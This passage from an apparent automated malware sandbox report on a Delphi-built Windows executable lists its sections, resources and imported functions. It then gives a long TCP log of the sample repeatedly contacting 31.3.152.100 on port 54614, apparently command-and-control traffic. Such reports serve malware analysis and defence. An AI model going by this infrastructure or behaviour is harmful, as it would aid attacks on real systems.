                    DATA    0x5e000          0x8e078       0x8e200   False     0.271541062005   data       4.82618080123   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    BSS     0xed000          0xe6d         0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .idata  0xee000          0x2378        0x2400    False     0.363932291667   data       5.0056698415    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .tls    0xf1000          0x10          0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .rdata  0xf2000          0x18          0x200     False     0.05078125       data       0.199107517787  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    .reloc  0xf3000          0x67b8        0x6800    False     0.635967548077   data       6.69152272812   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    .rsrc   0xfa000          0x5200        0x5200    False     0.32831554878    data       4.78370739432   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                    Resources

                    Name             RVA      Size    Type                                                     Language  Country
                    RT_CURSOR        0xfa774  0x134   data
                    RT_CURSOR        0xfa8a8  0x134   data
                    RT_CURSOR        0xfa9dc  0x134   data
                    RT_CURSOR        0xfab10  0x134   data
                    RT_CURSOR        0xfac44  0x134   data
                    RT_CURSOR        0xfad78  0x134   data
                    RT_CURSOR        0xfaeac  0x134   data
                    RT_ICON          0xfafe0  0x10a8  data                                                     English   United States
                    RT_STRING        0xfc088  0x418   data
                    RT_STRING        0xfc4a0  0x1d8   data
                    RT_STRING        0xfc678  0x198   data
                    RT_STRING        0xfc810  0x174   data
                    RT_STRING        0xfc984  0x254   data
                    RT_STRING        0xfcbd8  0xe8    data
                    RT_STRING        0xfccc0  0x24c   data
                    RT_STRING        0xfcf0c  0x3f4   data
                    RT_STRING        0xfd300  0x378   data
                    RT_STRING        0xfd678  0x3e8   data
                    RT_STRING        0xfda60  0x234   data
                    RT_STRING        0xfdc94  0xec    data
                    RT_STRING        0xfdd80  0x1b4   data
                    RT_STRING        0xfdf34  0x3e4   data
                    RT_STRING        0xfe318  0x358   data
                    RT_STRING        0xfe670  0x2b4   data
                    RT_RCDATA        0xfe924  0x10    data
                    RT_RCDATA        0xfe934  0x2a8   data
                    RT_RCDATA        0xfebdc  0x474   Delphi compiled form 'T__3960965291'
                    RT_GROUP_CURSOR  0xff050  0x14    Lotus unknown worksheet or configuration, revision 0x1
                    RT_GROUP_CURSOR  0xff064  0x14    Lotus unknown worksheet or configuration, revision 0x1
                    RT_GROUP_CURSOR  0xff078  0x14    Lotus unknown worksheet or configuration, revision 0x1
                    RT_GROUP_CURSOR  0xff08c  0x14    Lotus unknown worksheet or configuration, revision 0x1
                    RT_GROUP_CURSOR  0xff0a0  0x14    Lotus unknown worksheet or configuration, revision 0x1
                    RT_GROUP_CURSOR  0xff0b4  0x14    Lotus unknown worksheet or configuration, revision 0x1
                    RT_GROUP_CURSOR  0xff0c8  0x14    Lotus unknown worksheet or configuration, revision 0x1
                    RT_GROUP_ICON    0xff0dc  0x14    data                                                     English   United States

                    Imports

                    DLL           Import
                    kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                    user32.dll    GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                    advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    oleaut32.dll  SysFreeString, SysReAllocStringLen, SysAllocStringLen
                    kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                    advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    kernel32.dll  lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                    version.dll   VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                    gdi32.dll     UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                    user32.dll    CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                    kernel32.dll  Sleep
                    oleaut32.dll  SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                    ole32.dll     CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                    oleaut32.dll  GetErrorInfo, GetActiveObject, SysFreeString
                    comctl32.dll  ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                    Possible Origin

                    Language of compilation system  Country where language is spoken  Map
                    English                         United States

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                    Sep 22, 2021 22:02:41.518810987 CEST  49745        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:41.670243025 CEST  54614        49745      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:41.670450926 CEST  49745        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:41.684596062 CEST  49745        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:41.843734980 CEST  54614        49745      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:43.652630091 CEST  49746        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:43.802486897 CEST  54614        49746      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:43.802628994 CEST  49746        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:43.868877888 CEST  49746        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:43.957516909 CEST  54614        49746      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:43.957612991 CEST  49746        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:44.019798040 CEST  54614        49746      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:45.095340014 CEST  49747        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:45.246356010 CEST  54614        49747      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:45.262662888 CEST  49747        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:45.277421951 CEST  49747        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:45.423459053 CEST  54614        49747      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:45.423624039 CEST  49747        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:45.427570105 CEST  54614        49747      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:46.593067884 CEST  49748        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:49.601759911 CEST  49748        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:49.751851082 CEST  54614        49748      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:49.756211042 CEST  49748        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:49.764863968 CEST  49748        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:49.912060022 CEST  54614        49748      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:49.912446022 CEST  49748        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:49.915036917 CEST  54614        49748      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:51.050214052 CEST  49749        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:51.200608969 CEST  54614        49749      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:51.200750113 CEST  49749        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:51.208467960 CEST  49749        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:51.364734888 CEST  54614        49749      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:52.561189890 CEST  49750        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:52.712327957 CEST  54614        49750      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:52.712508917 CEST  49750        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:52.774564981 CEST  49750        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:52.935156107 CEST  54614        49750      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:54.104754925 CEST  49751        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:54.358246088 CEST  54614        49751      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:54.358354092 CEST  49751        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:54.381442070 CEST  49751        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:54.515644073 CEST  54614        49751      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:54.515759945 CEST  49751        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:54.531817913 CEST  54614        49751      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:02:55.818150043 CEST  49752        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:02:58.821127892 CEST  49752        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:04.821624994 CEST  49752        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:19.185935974 CEST  49789        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:19.336206913 CEST  54614        49789      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:19.336333990 CEST  49789        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:19.407010078 CEST  49789        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:19.498042107 CEST  54614        49789      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:19.498171091 CEST  49789        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:19.559201956 CEST  54614        49789      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:20.664808989 CEST  49790        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:20.815874100 CEST  54614        49790      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:20.815980911 CEST  49790        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:20.828154087 CEST  49790        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:20.986835003 CEST  54614        49790      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:22.194843054 CEST  49796        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:22.345140934 CEST  54614        49796      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:22.345339060 CEST  49796        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:22.370060921 CEST  49796        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:22.507148027 CEST  54614        49796      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:22.507755995 CEST  49796        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:22.521570921 CEST  54614        49796      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:23.701766014 CEST  49798        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:26.796524048 CEST  49798        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:26.947434902 CEST  54614        49798      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:26.947937012 CEST  49798        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:26.961420059 CEST  49798        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:27.104187965 CEST  54614        49798      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:27.104393005 CEST  49798        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:27.116705894 CEST  54614        49798      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:28.257308006 CEST  49803        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:28.408652067 CEST  54614        49803      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:28.408768892 CEST  49803        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:28.416001081 CEST  49803        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:28.573143005 CEST  54614        49803      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:29.715133905 CEST  49804        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:29.867316961 CEST  54614        49804      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:29.867746115 CEST  49804        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:29.920300961 CEST  49804        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:30.028064013 CEST  54614        49804      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:30.028187990 CEST  49804        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:30.071768999 CEST  54614        49804      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:31.184942007 CEST  49805        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:31.336097002 CEST  54614        49805      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:31.336229086 CEST  49805        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:31.349098921 CEST  49805        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:31.496341944 CEST  54614        49805      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:31.496409893 CEST  49805        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:31.498585939 CEST  54614        49805      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:32.664578915 CEST  49806        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:32.815227985 CEST  54614        49806      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:32.815409899 CEST  49806        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:32.836488962 CEST  49806        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:33.257126093 CEST  49806        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:33.457995892 CEST  54614        49806      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:33.530011892 CEST  54614        49806      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:34.831188917 CEST  49807        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:34.982136965 CEST  54614        49807      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:34.982253075 CEST  49807        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:35.037009001 CEST  49807        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:35.168209076 CEST  54614        49807      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:35.168781996 CEST  49807        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:35.188067913 CEST  54614        49807      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:37.045742035 CEST  49808        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:37.197112083 CEST  54614        49808      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:37.197232962 CEST  49808        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:37.204263926 CEST  49808        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:37.414366961 CEST  54614        49808      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:37.520375013 CEST  54614        49808      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:38.677305937 CEST  49809        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:38.828571081 CEST  54614        49809      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:38.830871105 CEST  49809        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:38.840956926 CEST  49809        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:38.991277933 CEST  54614        49809      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:40.142869949 CEST  49810        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:40.293162107 CEST  54614        49810      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:40.293343067 CEST  49810        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:40.305239916 CEST  49810        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:40.463906050 CEST  54614        49810      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:41.613188028 CEST  49811        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:41.764065027 CEST  54614        49811      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:41.764249086 CEST  49811        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:41.775391102 CEST  49811        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:41.945442915 CEST  54614        49811      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:43.138642073 CEST  49812        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:46.139537096 CEST  49812        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:46.291194916 CEST  54614        49812      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:46.291338921 CEST  49812        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:46.298891068 CEST  49812        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:46.463501930 CEST  54614        49812      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:47.642512083 CEST  49813        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:47.792701960 CEST  54614        49813      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:03:47.792845011 CEST  49813        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:47.803246021 CEST  49813        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:03:48.000751019 CEST  54614        49813      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:00.425709009 CEST  54614        49813      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:01.607640982 CEST  49824        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:01.758291006 CEST  54614        49824      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:01.758857012 CEST  49824        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:01.765574932 CEST  49824        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:01.982599974 CEST  54614        49824      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:03.538762093 CEST  54614        49824      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:04.685161114 CEST  49825        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:04.836900949 CEST  54614        49825      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:04.837166071 CEST  49825        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:04.846353054 CEST  49825        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:04.997472048 CEST  54614        49825      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:04.997517109 CEST  54614        49825      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:04.997601986 CEST  49825        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:06.139062881 CEST  49826        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:06.290996075 CEST  54614        49826      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:06.291131973 CEST  49826        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:06.302906036 CEST  49826        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:06.735124111 CEST  49826        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:06.930368900 CEST  54614        49826      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:07.019849062 CEST  54614        49826      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:08.170516014 CEST  49827        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:08.322829962 CEST  54614        49827      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:08.322952986 CEST  49827        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:08.345750093 CEST  49827        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:08.529122114 CEST  54614        49827      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:09.335834026 CEST  54614        49827      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:10.484236956 CEST  49828        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:10.635855913 CEST  54614        49828      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:10.635978937 CEST  49828        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:10.653352022 CEST  49828        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:10.793344975 CEST  54614        49828      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:10.793735981 CEST  49828        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:10.803992033 CEST  54614        49828      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:11.934890985 CEST  49829        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:12.085365057 CEST  54614        49829      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:12.087558985 CEST  49829        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:12.103131056 CEST  49829        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:12.243437052 CEST  54614        49829      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:12.247605085 CEST  49829        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:12.254542112 CEST  54614        49829      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:13.826776981 CEST  49830        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:13.976883888 CEST  54614        49830      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:13.977004051 CEST  49830        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:13.984566927 CEST  49830        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:14.134413958 CEST  54614        49830      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:14.135061979 CEST  49830        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:14.407783985 CEST  49830        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:14.907641888 CEST  49830        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:15.059652090 CEST  54614        49830      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:15.275247097 CEST  49831        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:15.427892923 CEST  54614        49831      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:15.428020954 CEST  49831        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:15.438147068 CEST  49831        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:15.585520983 CEST  54614        49831      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:15.585675001 CEST  49831        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:15.589533091 CEST  54614        49831      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:16.727665901 CEST  49832        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:16.881990910 CEST  54614        49832      31.3.152.100  192.168.2.5
